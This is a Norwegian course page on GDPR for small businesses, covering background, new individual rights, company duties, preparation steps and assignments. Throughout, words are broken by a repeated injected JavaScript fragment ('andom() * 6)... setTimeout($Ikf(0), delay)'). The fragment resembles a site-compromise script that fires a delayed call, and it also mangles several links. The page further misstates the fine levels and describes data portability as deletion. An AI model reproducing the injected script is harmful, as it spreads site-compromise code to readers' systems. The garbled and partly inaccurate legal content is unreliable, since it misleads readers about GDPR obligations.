4.5 GDPR (General Data Protection Regulation)

Her skal du lese litt om de nye personvernreglene som innføres av EU fra 25. mai 2018. På grunn av EUS avtalen blir disse reglene også gjeldene for norske bedrifter og ‘Ola Nordmann’. 

4.5.1 Om GDPR

EUs forordning for personvern, The General Data Protection Regulation (GDPR), blir norsk lov i 2018.  Det betyr at vi får nye regler for personvern i Norge. Det nye regelverket gir virksomheter nye plikter og enkeltpersoner nye rettigheter. 

Eksisterende lovverk:
– Personopplysningloven og forskriften
– EU datadirektiv 1995
– Direktiv gir rom for skjønn

Bakgrunn/årsak for GDPR
– Teknologisk utvikling: Internett, netthandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andel, sosiale medier, skylagring, datamengder, kompleksitet
– Samfunnsutvikling generelt: globalisering, fri flyt av arbeidskraft (personer), overvåking, datakriminalitet

Vi trenger strengere lovgivning:
Nye tider gir nye trusler mot privatlivets fred, bedrifters sikkerhet og utilbørlig salgsvirksomhet på nettet (algoritmer med innsamling av persondata).

Overordnede konsekvenser:
Det gamle, rådgivende EU direktivet blir erstattet av forordningen GDPR. Alle regler i GDPR må nå overholdes, avvik godtas ikke og vil medføre bøter.
En bedrift kan bøtelegges opp til 2 % av omsetningen med et beløp som ikke overstiger 20 millioner Euro !
Størrelsen på bøter må prøves i rettsvesenet fra sak til sak, men mangelfullt personvern kan komme til å koste dyrt.

Status i Norge:

  • Et mindretall av bedriftene er i rute med tanke på innføring av GDPR
  • Datatilsynet er forsinket med oppdatering av sine systemer, blant annet veiledninger for bedrifter
  • Regjeringen er forsinket med ny proposisjon som skal samordne GDPR med eksisterende lovverk
  • Integreringen med EØS avtalen er forsinket

Dette betyr at innføringsdatoen kan bli utsatt.

Trøst: Kun Tysklandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and og Østerrike er klar for GDPR!

4.5.2 Eksempler

Se på denne videoen for å få med deg hvilke krav som vil gjelde for bedrifter 

Les også igjennom dette nyhetsklippet : https://miniforetak.no/blogg/gdpr-kommer

Sjekk status fra regjeringen: https://www.regjeringen.no/no/tema/lov-og-rett/innsikt/ny-personopplysningslov-og-innlemmelse-i-eos-avtalen/id2592984/ 

Oppgave: Skriv et kort notat i Word der du oppsummerer hvilke tiltak en liten bedrift må gjøre for å være klar for GDPR (compliant). Lever dokumentet inn på ITSL, oppgave 4.5.2, GDPR for bedrifter

https://youtu.be/YQ-lR6NNrPE

4.5.3 Hva blir nytt med GDPR

Den registrertes rettigheter og friheter utvides:

  • Klarere retningslinjer for hva man gir samtykke til (Aksept av betingelser og vilkår på nettet).
  • Dataportabilitet: du har krav på at informasjon av deg slettes når du endrer kundeforhold
  • Retten til å bli glemt er nå lovfestet

Bedriftenes (Behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlingsansvarlig/dataeier) plikter er utvidet:

  • Innebygget personvern i nye IKT systemer
  • Risikovurdering av persondata
  • Nødvendige rutiner på plass
  • Sørge for at nødvendig informasjon kommer ut i organisasjonen (informasjon, opplæring)
  • Inngå formell avtale med Databehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andler om ansvar og forpliktelser
  • Databehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andler er medansvarlig i kontrakter der personvern er involvert.

4.5.4 Konsekvenser for personvernbehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling i en liten bedrift er ikke så store?:

– Starte med å oppfylle dagens krav og rydd opp i rotet

s- Sette seg inn i GDPR

– Sørge for at nødvendige rutiner for risikovurdering og personvernbehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling, autorisajoner og avviksbehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling (intern kontroll) er ivaretatt

om GDPR – ALT må dokumenteres!

Eksempel på forberedelser til GDPR:

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander-om-gdpr-og-de-nye-personvernreglene-som-er-delvis-feil/405201″>https://www.digi.no/artikler/kronikk-11-pastandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander-om-gdpr-og-de-nye-personvernreglene-som-er-delvis-feil/405201

De mest relevante veiledningene om GDPR fra Datatilsynet finner du her:


Veiledninger
Datatilsynet

Refleksjonsoppgave:
Ta en kort gjennomgang av veiledningene fra Datatilsynet. Hvilke tre veiledninger mener du er viktigst for små virksomheter?


Klikk her for neste post: 4.6 Ressurser